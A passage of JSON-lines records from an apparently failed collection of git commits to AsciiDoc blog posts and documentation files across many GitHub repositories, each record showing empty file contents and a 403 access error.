2020-02-07-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-07-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_file":"_posts\/2020-02-07-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92d2b4db1db5144265929a98e48427bd567c5bb5","subject":"Update 2015-08-28-DIYDrone-Resources.adoc","message":"Update 2015-08-28-DIYDrone-Resources.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-08-28-DIYDrone-Resources.adoc","new_file":"_posts\/2015-08-28-DIYDrone-Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b0236999150e181040fa0d67ba12e65a691cb8b","subject":"#58 added initial doc to fix build","message":"#58 added initial doc to fix build\n","repos":"openwms\/org.openwms,openwms\/org.openwms","old_file":"org.openwms.tms\/org.openwms.tms.transportation\/src\/main\/asciidoc\/api.adoc","new_file":"org.openwms.tms\/org.openwms.tms.transportation\/src\/main\/asciidoc\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openwms\/org.openwms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7e1d6fe3ecc94eb74f33d6444bea81af1fb3634","subject":"[Docs] Remove typo in painless-getting-started.asciidoc","message":"[Docs] Remove typo in 
painless-getting-started.asciidoc\n","repos":"scorpionvicky\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch","old_file":"docs\/painless\/painless-getting-started.asciidoc","new_file":"docs\/painless\/painless-getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e916f5633f409268e41638d44d1e72555c01f56a","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76b3224fb7735e8fe9b8ed01758d4ddd282cb032","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39a6b01442cb02c00b81e53c29bc248873fc96cd","subject":"y2b create post DON'T Buy The iPhone 8, Buy The iPhone 8.","message":"y2b create post DON'T Buy The iPhone 8, Buy The iPhone 8.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-23-DONT-Buy-The-iPhone-8-Buy-The-iPhone-8.adoc","new_file":"_posts\/2017-09-23-DONT-Buy-The-iPhone-8-Buy-The-iPhone-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07876f8c502ecbd7d6fda513ab4b7e70874e9ecd","subject":"Publish conference-java-Conference-annotations-java-compte-rendu.adoc","message":"Publish conference-java-Conference-annotations-java-compte-rendu.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"conference-java-Conference-annotations-java-compte-rendu.adoc","new_file":"conference-java-Conference-annotations-java-compte-rendu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab09a9b5c2a223a37a69ac798b0ee23c9167abd5","subject":"List of test suites","message":"List of test suites\n","repos":"MSG134\/IVCT_Framework,MSG134\/IVCT_Framework,MSG134\/IVCT_Framework","old_file":"docs\/testsuite-overview.adoc","new_file":"docs\/testsuite-overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MSG134\/IVCT_Framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"742dab7fcb77cf3186815bdba15cf380ff5b8984","subject":"Update 2016-01-19-Why-I-am-reading-exactly-one-technical-article-per-day.adoc","message":"Update 2016-01-19-Why-I-am-reading-exactly-one-technical-article-per-day.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-01-19-Why-I-am-reading-exactly-one-technical-article-per-day.adoc","new_file":"_posts\/2016-01-19-Why-I-am-reading-exactly-one-technical-article-per-day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85da0d3d3510311f8d9694cb28bf178d42c2fcae","subject":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","message":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"88d7203813d93aeec2c45a27809a76a2ce706251","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed8696b4ceba2416876bc1dc09a23b24775103bd","subject":"Update 2016-07-25-Get-a-fake-REST-API-with-zero-coding.adoc","message":"Update 2016-07-25-Get-a-fake-REST-API-with-zero-coding.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2016-07-25-Get-a-fake-REST-API-with-zero-coding.adoc","new_file":"_posts\/2016-07-25-Get-a-fake-REST-API-with-zero-coding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1fde706bd885ae9d4cf12ee3f9a91069214d493","subject":"Update 2014-04-18-Engaged-Invention.adoc","message":"Update 2014-04-18-Engaged-Invention.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"42561ed60aba74165d01be81f494501cdb9780bd","subject":"Oups...","message":"Oups...","repos":"tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,metlos\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a1bdf480c3f0bd0f6be8c43e48702f0580441a5","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c7517cd834fddb862d7e57a14360f0134536d46","subject":"Update 2016-6-27-PHP.adoc","message":"Update 2016-6-27-PHP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHP.adoc","new_file":"_posts\/2016-6-27-PHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bce477ca14980ec888b087ecf2b2471d2572ac9","subject":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","message":"y2b create post Unboxing Google Home Mini With Demar 
DeRozan!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-19-Unboxing%20Google%20Home%20Mini%20With%20Demar%20DeRozan!.adoc","new_file":"_posts\/2017-12-19-Unboxing%20Google%20Home%20Mini%20With%20Demar%20DeRozan!.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6d618556c1a9042af8cc069911dd248246e9e8e","subject":"rearrange env variable section layout","message":"rearrange env variable section layout\n","repos":"nafest\/ninja,kissthink\/ninja,sxlin\/dist_ninja,atetubou\/ninja,purcell\/ninja,sorbits\/ninja,kimgr\/ninja,atetubou\/ninja,synaptek\/ninja,mdempsky\/ninja,ndsol\/subninja,tfarina\/ninja,dendy\/ninja,pck\/ninja,glensc\/ninja,synaptek\/ninja,nocnokneo\/ninja,ninja-build\/ninja,ilor\/ninja,jimon\/ninja,kimgr\/ninja,tfarina\/ninja,nico\/ninja,lizh06\/ninja,TheOneRing\/ninja,bradking\/ninja,ignatenkobrain\/ninja,juntalis\/ninja,Maratyszcza\/ninja-pypi,syntheticpp\/ninja,iwadon\/ninja,syntheticpp\/ninja,ThiagoGarciaAlves\/ninja,dorgonman\/ninja,jendrikillner\/ninja,colincross\/ninja,rjogrady\/ninja,yannicklm\/ninja,Qix-\/ninja,hnney\/ninja,ignatenkobrain\/ninja,dorgonman\/ninja,dendy\/ninja,bradking\/ninja,drbo\/ninja,dpwright\/ninja,liukd\/ninja,guiquanz\/ninja,dabrahams\/ninja,mdempsky\/ninja,TheOneRing\/ninja,maruel\/ninja,hnney\/ninja,jhanssen\/ninja,pck\/ninja,dabrahams\/ninja,nafest\/ninja,tfarina\/ninja,dendy\/ninja,sgraham\/ninja,ctiller\/ninja,Maratyszcza\/ninja-pypi,syntheticpp\/ninja,rnk\/ninja,dabrahams\/ninja,ndsol\/subninja,moroten\/ninja,hnney\/ninja,ilor\/ninja,TheOneRing\/ninja,mgaunard\/ninja,Qix-\/ninja,sorbits\/ninja,nicolasdespres\/ninja,nicolasdespres\/ninja,nocnokneo\/ninja,sorbits\/ninja,liukd\/ninja,dorgonman\/ninja,iwadon\/ninja,guiquanz\/ninja,metti\/ninja,vvvrrooomm\/ninja,AoD314\/ninja,fifoforlifo\/ninja,sxlin\/dist_ninja,fuchsia-mirror\/third_party-ninja,maruel\/ninja,ikarienator\/ninja,sxlin\/dist_ninja,ndsol\/subninja,rnk\/ninja,rnk\/ninja,jimon\/ninja,pck\/ninja,ikarienator\/ninja,dpwright\/ninja,jsternberg\/ninja,mohamed\/ninja,nocnokneo\/ninja,fifoforlifo\/ninja,mgaunard\/ninja,nocnokneo\/ninja,Qix-\/ninja,nico\/ninja,autopulated\/ninja,automeka\/ninja,fifoforlifo\/ninja,martine\/ninja,moroten\/ninja,ndsol\/subninja,jendrikillner\/ninja,ilor\/ninja,nicolasdespres\/ninja,jhanssen\/ninja,mgaunard\/ninja,mohamed\/ninja,drbo\/ninja,Maratyszcza\/ninja-pypi,fuchsia-mirror\/third_party-ninja,rjogrady\/ninja,hnney\/ninja,lizh06\/ninja,moroten\/ninja,jsternberg\/ninja,Ju2ender\/ninja,ninja-build\/ninja,drbo\/ninja,juntalis\/ninja,iwadon\/ninja,TheOneRing\/ninja,purcell\/ninja,vvvrrooomm\/ninja,liukd\/ninja,metti\/ninja,nafest\/ninja,vvvrrooomm\/ninja,bmeurer\/ninja,bradking\/ninja,colincross\/ninja,mdempsky\/ninja,jsternberg\/ninja,kimgr\/ninja,purcell\/ninja,mydongistiny\/ninja,nickhutchinson\/ninja,yannicklm\/ninja,pathscale\/ninja,sxlin\/dist_ninja,ilor\/ninja,maruel\/ninja,AoD314\/ninja,bmeurer\/ninja,nicolasdespres\/ninja,juntalis\/ninja,kimgr\/ninja,fuchsia-mirror\/third_party-ninja,synaptek\/ninja,ikarienator\/ninja,maruel\/ninja,dpwright\/ninja,dpwright\/ninja,pathscale\/ninja,sxlin\/dist_ninja,bmeurer\/ninja,mydongistiny\/ninja,Maratyszcza\/ninja-pypi,jhanssen\/ninja,rnk\/ninja,liukd\/ninja,colincross\/ninja,nickhutchinson\/ninja,Ju2ender\/ni
nja,nico\/ninja,autopulated\/ninja,yannicklm\/ninja,ThiagoGarciaAlves\/ninja,iwadon\/ninja,fifoforlifo\/ninja,moroten\/ninja,pathscale\/ninja,jhanssen\/ninja,guiquanz\/ninja,purcell\/ninja,ThiagoGarciaAlves\/ninja,ignatenkobrain\/ninja,AoD314\/ninja,tfarina\/ninja,mohamed\/ninja,automeka\/ninja,martine\/ninja,guiquanz\/ninja,jsternberg\/ninja,lizh06\/ninja,sgraham\/ninja,kissthink\/ninja,atetubou\/ninja,mgaunard\/ninja,pck\/ninja,glensc\/ninja,sgraham\/ninja,synaptek\/ninja,drbo\/ninja,AoD314\/ninja,atetubou\/ninja,jendrikillner\/ninja,ctiller\/ninja,rjogrady\/ninja,ikarienator\/ninja,ninja-build\/ninja,ThiagoGarciaAlves\/ninja,vvvrrooomm\/ninja,kissthink\/ninja,Ju2ender\/ninja,syntheticpp\/ninja,yannicklm\/ninja,nafest\/ninja,ninja-build\/ninja,automeka\/ninja,metti\/ninja,sorbits\/ninja,nickhutchinson\/ninja,dendy\/ninja,ctiller\/ninja,rjogrady\/ninja,juntalis\/ninja,metti\/ninja,sxlin\/dist_ninja,jimon\/ninja,nickhutchinson\/ninja,sxlin\/dist_ninja,Qix-\/ninja,jimon\/ninja,autopulated\/ninja,mohamed\/ninja,lizh06\/ninja,bmeurer\/ninja,jendrikillner\/ninja,nico\/ninja,pathscale\/ninja,dabrahams\/ninja,automeka\/ninja,mdempsky\/ninja,colincross\/ninja,Ju2ender\/ninja,martine\/ninja,mydongistiny\/ninja,sgraham\/ninja,ignatenkobrain\/ninja,dorgonman\/ninja,ctiller\/ninja,martine\/ninja,kissthink\/ninja,mydongistiny\/ninja,autopulated\/ninja,glensc\/ninja,fuchsia-mirror\/third_party-ninja,glensc\/ninja,bradking\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d56f995ef0b86e46f87e596a87f16b4d636968f5","subject":"make doc xrefs link to section headers","message":"make doc xrefs link to section 
headers\n","repos":"glensc\/ninja,hnney\/ninja,yannicklm\/ninja,sxlin\/dist_ninja,ilor\/ninja,AoD314\/ninja,TheOneRing\/ninja,moroten\/ninja,sgraham\/ninja,sgraham\/ninja,mydongistiny\/ninja,sxlin\/dist_ninja,dendy\/ninja,rnk\/ninja,nicolasdespres\/ninja,juntalis\/ninja,bmeurer\/ninja,fuchsia-mirror\/third_party-ninja,jendrikillner\/ninja,nico\/ninja,rnk\/ninja,liukd\/ninja,bradking\/ninja,mohamed\/ninja,vvvrrooomm\/ninja,jhanssen\/ninja,purcell\/ninja,moroten\/ninja,autopulated\/ninja,maruel\/ninja,ThiagoGarciaAlves\/ninja,mydongistiny\/ninja,nickhutchinson\/ninja,fifoforlifo\/ninja,nocnokneo\/ninja,mgaunard\/ninja,dpwright\/ninja,glensc\/ninja,autopulated\/ninja,jhanssen\/ninja,fifoforlifo\/ninja,kimgr\/ninja,dabrahams\/ninja,purcell\/ninja,TheOneRing\/ninja,pck\/ninja,nico\/ninja,bmeurer\/ninja,atetubou\/ninja,colincross\/ninja,sorbits\/ninja,dabrahams\/ninja,vvvrrooomm\/ninja,sxlin\/dist_ninja,jendrikillner\/ninja,iwadon\/ninja,syntheticpp\/ninja,ikarienator\/ninja,purcell\/ninja,ndsol\/subninja,juntalis\/ninja,ikarienator\/ninja,syntheticpp\/ninja,jimon\/ninja,pathscale\/ninja,hnney\/ninja,ilor\/ninja,guiquanz\/ninja,nicolasdespres\/ninja,sgraham\/ninja,synaptek\/ninja,sorbits\/ninja,rnk\/ninja,moroten\/ninja,sxlin\/dist_ninja,atetubou\/ninja,rjogrady\/ninja,synaptek\/ninja,drbo\/ninja,moroten\/ninja,martine\/ninja,kissthink\/ninja,maruel\/ninja,drbo\/ninja,drbo\/ninja,sxlin\/dist_ninja,automeka\/ninja,tfarina\/ninja,ilor\/ninja,fuchsia-mirror\/third_party-ninja,jimon\/ninja,liukd\/ninja,Qix-\/ninja,Maratyszcza\/ninja-pypi,automeka\/ninja,nickhutchinson\/ninja,pathscale\/ninja,Maratyszcza\/ninja-pypi,dendy\/ninja,sxlin\/dist_ninja,jhanssen\/ninja,ikarienator\/ninja,metti\/ninja,mdempsky\/ninja,AoD314\/ninja,jhanssen\/ninja,Qix-\/ninja,nickhutchinson\/ninja,ignatenkobrain\/ninja,jendrikillner\/ninja,mdempsky\/ninja,nico\/ninja,mgaunard\/ninja,mydongistiny\/ninja,mohamed\/ninja,dabrahams\/ninja,autopulated\/ninja,bmeurer\/ninja,nafest\/ninja,kimgr\/ninja,ignatenkobrain\/ninja,glensc\/ninja,tfarina\/ninja,juntalis\/ninja,autopulated\/ninja,Maratyszcza\/ninja-pypi,synaptek\/ninja,kimgr\/ninja,ninja-build\/ninja,ninja-build\/ninja,guiquanz\/ninja,sorbits\/ninja,iwadon\/ninja,nafest\/ninja,metti\/ninja,metti\/ninja,colincross\/ninja,ikarienator\/ninja,ThiagoGarciaAlves\/ninja,yannicklm\/ninja,metti\/ninja,nafest\/ninja,AoD314\/ninja,jimon\/ninja,nicolasdespres\/ninja,nicolasdespres\/ninja,ignatenkobrain\/ninja,martine\/ninja,dorgonman\/ninja,fuchsia-mirror\/third_party-ninja,dorgonman\/ninja,nafest\/ninja,Qix-\/ninja,kimgr\/ninja,ninja-build\/ninja,pck\/ninja,jimon\/ninja,ThiagoGarciaAlves\/ninja,kissthink\/ninja,automeka\/ninja,fuchsia-mirror\/third_party-ninja,mdempsky\/ninja,yannicklm\/ninja,colincross\/ninja,pck\/ninja,drbo\/ninja,glensc\/ninja,liukd\/ninja,nocnokneo\/ninja,nocnokneo\/ninja,syntheticpp\/ninja,dorgonman\/ninja,mydongistiny\/ninja,dpwright\/ninja,nico\/ninja,mgaunard\/ninja,lizh06\/ninja,ctiller\/ninja,dpwright\/ninja,Ju2ender\/ninja,maruel\/ninja,ilor\/ninja,dorgonman\/ninja,hnney\/ninja,mgaunard\/ninja,juntalis\/ninja,rjogrady\/ninja,atetubou\/ninja,jendrikillner\/ninja,sxlin\/dist_ninja,lizh06\/ninja,mohamed\/ninja,rnk\/ninja,ninja-build\/ninja,automeka\/ninja,syntheticpp\/ninja,colincross\/ninja,maruel\/ninja,nocnokneo\/ninja,iwadon\/ninja,dendy\/ninja,bradking\/ninja,ignatenkobrain\/ninja,vvvrrooomm\/ninja,fifoforlifo\/ninja,liukd\/ninja,Maratyszcza\/ninja-pypi,tfarina\/ninja,hnney\/ninja,bradking\/ninja,AoD314\/ninja,pathscale\/ninja,kissthink\/ninja,rjogrady\/ninja,
guiquanz\/ninja,atetubou\/ninja,sgraham\/ninja,sorbits\/ninja,lizh06\/ninja,martine\/ninja,ctiller\/ninja,dendy\/ninja,rjogrady\/ninja,ndsol\/subninja,Ju2ender\/ninja,TheOneRing\/ninja,pathscale\/ninja,kissthink\/ninja,pck\/ninja,guiquanz\/ninja,tfarina\/ninja,Qix-\/ninja,ctiller\/ninja,dpwright\/ninja,ThiagoGarciaAlves\/ninja,dabrahams\/ninja,purcell\/ninja,nickhutchinson\/ninja,mdempsky\/ninja,Ju2ender\/ninja,mohamed\/ninja,vvvrrooomm\/ninja,yannicklm\/ninja,ndsol\/subninja,bmeurer\/ninja,fifoforlifo\/ninja,iwadon\/ninja,ctiller\/ninja,synaptek\/ninja,lizh06\/ninja,ndsol\/subninja,martine\/ninja,Ju2ender\/ninja,bradking\/ninja,TheOneRing\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7c8dd08d77de52934549a0cb364cf567c0593281","subject":"y2b create post Nintendo 3DS Unboxing (US Version - Black)","message":"y2b create post Nintendo 3DS Unboxing (US Version - Black)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-27-Nintendo-3DS-Unboxing-US-Version--Black.adoc","new_file":"_posts\/2011-03-27-Nintendo-3DS-Unboxing-US-Version--Black.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdf40db1f6fc5c79d7bf26bb59c5949994fe0308","subject":"Update 2013-11-12-Mockito-le-mock-facile.adoc","message":"Update 2013-11-12-Mockito-le-mock-facile.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-11-12-Mockito-le-mock-facile.adoc","new_file":"_posts\/2013-11-12-Mockito-le-mock-facile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"313df4b6e5955edaa1823498fce9f3128fa16bc9","subject":"Update 2016-02-14-S-A-S-S-Compass-Review.adoc","message":"Update 2016-02-14-S-A-S-S-Compass-Review.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2016-02-14-S-A-S-S-Compass-Review.adoc","new_file":"_posts\/2016-02-14-S-A-S-S-Compass-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13a5bac342ee43709af2d03364f98ff3c96475af","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 